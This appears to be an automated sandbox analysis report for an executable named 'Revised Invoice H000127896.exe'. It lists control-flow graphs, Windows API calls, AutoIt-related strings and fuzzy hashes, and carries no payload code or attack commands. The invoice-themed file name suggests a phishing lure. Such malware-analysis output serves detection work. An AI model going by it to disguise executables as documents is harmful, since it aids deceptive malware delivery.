                              control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1932 40e5b4 1925->1932 1933 427645-42764f 1925->1933 1926->1918 1931 42765d-42766f 1926->1931 1934 4276b0 1927->1934 1935 4276aa-4276ae 1927->1935 1929->1918 1930->1918 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                              • String ID: 0SH
                              • API String ID: 3363477735-851180471
                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                              APIs
                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: IsThemeActive$uxtheme.dll
                              • API String ID: 2574300362-3542929980
                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchSleepTranslate
                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                              • API String ID: 1762048999-758534266
                              • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                              • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Revised Invoice H000127896.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • __wcsicoll.LIBCMT ref: 00402007
                              • __wcsicoll.LIBCMT ref: 0040201D
                              • __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                              • __wcsicoll.LIBCMT ref: 00402049
                              • _wcscpy.LIBCMT ref: 0040207C
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Revised Invoice H000127896.exe,00000104), ref: 00428B5B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Revised Invoice H000127896.exe$CMDLINE$CMDLINERAW
                              • API String ID: 3948761352-2388172699
                              • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                              • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __fread_nolock$_fseek_wcscpy
                              • String ID: D)E$D)E$FILE
                              • API String ID: 3888824918-361185794
                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                              • __wsplitpath.LIBCMT ref: 0040E41C
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcsncat.LIBCMT ref: 0040E433
                              • __wmakepath.LIBCMT ref: 0040E44F
                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • _wcscpy.LIBCMT ref: 0040E487
                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • _wcscat.LIBCMT ref: 00427541
                              • _wcslen.LIBCMT ref: 00427551
                              • _wcslen.LIBCMT ref: 00427562
                              • _wcscat.LIBCMT ref: 0042757C
                              • _wcsncpy.LIBCMT ref: 004275BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                              • String ID: Include$\
                              • API String ID: 3173733714-3429789819
                              • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                              • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                              Control-flow Graph

                              APIs
                              • _fseek.LIBCMT ref: 0045292B
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452961
                              • __fread_nolock.LIBCMT ref: 00452971
                              • __fread_nolock.LIBCMT ref: 0045298A
                              • __fread_nolock.LIBCMT ref: 004529A5
                              • _fseek.LIBCMT ref: 004529BF
                              • _malloc.LIBCMT ref: 004529CA
                              • _malloc.LIBCMT ref: 004529D6
                              • __fread_nolock.LIBCMT ref: 004529E7
                              • _free.LIBCMT ref: 00452A17
                              • _free.LIBCMT ref: 00452A20
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                              • String ID:
                              • API String ID: 1255752989-0
                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • ImageList_ReplaceIcon.COMCTL32(00AAE548,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AAE548,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: Default
                              • API String ID: 1579825452-753088835
                              • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                              • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __fread_nolock_fseek_memmove_strcat
                              • String ID: AU3!$EA06
                              • API String ID: 1268643489-2658333250
                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2004 42b038-42b03f 2000->2004 2013 401193-40119a 2001->2013 2005 401151-401157 2002->2005 2006 40119d 2002->2006 2004->2003 2012 42b045-42b059 call 401000 call 40e0c0 2004->2012 2010 401219-40121f 2005->2010 2011 40115d 2005->2011 2008 4011a3-4011a9 2006->2008 2009 42afb4-42afc5 call 40f190 2006->2009 2008->2000 2014 4011af 2008->2014 2009->2013 2010->2000 2017 401225-42b06d call 468b0e 2010->2017 2015 401163-401166 2011->2015 2016 42b01d-42b024 2011->2016 2012->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2013 2021->2013 2031 401204-401216 CreatePopupMenu 2021->2031 2022->2003 2023->2003 2024->2000 2033 401174-42afde call 45fd57 2024->2033 2033->2003 2045 42afe4 2033->2045 2045->2013
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                              • CreatePopupMenu.USER32 ref: 00401204
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
